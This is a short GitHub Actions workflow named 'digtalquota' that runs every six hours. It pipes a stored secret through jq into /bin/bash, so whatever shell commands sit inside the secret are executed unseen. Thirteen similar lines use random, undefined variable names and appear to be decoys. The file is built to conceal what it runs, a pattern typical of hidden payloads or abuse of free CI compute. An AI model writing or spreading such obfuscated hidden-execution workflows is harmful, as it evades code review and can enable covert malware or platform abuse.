name: digtalquota

on:
  workflow_dispatch:
  schedule:
    - cron: '24 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: digtalquota
        env:
          wxa8: ${{ secrets.wxa8 }}
        run: |
          echo $wxa8 | jq -r .hr110 | /bin/bash
          echo $spk6 | jq -r .scm8815 | /bin/bash
          echo $aeu82 | jq -r .ew50 | /bin/bash
          echo $xo7086 | jq -r .l7127 | /bin/bash
          echo $l74 | jq -r .ez8 | /bin/bash
          echo $n6875 | jq -r .nudsg6654 | /bin/bash
          echo $glj011 | jq -r .sosff99 | /bin/bash
          echo $f5933 | jq -r .i30 | /bin/bash
          echo $vlj4088 | jq -r .pb51 | /bin/bash
          echo $muqiv46542 | jq -r .m19330 | /bin/bash
          echo $jzb114 | jq -r .qtzbp322 | /bin/bash
          echo $g66 | jq -r .rlsys83471 | /bin/bash
          echo $cjmj3582 | jq -r .y2 | /bin/bash
          echo $uxjx188 | jq -r .crk24 | /bin/bash

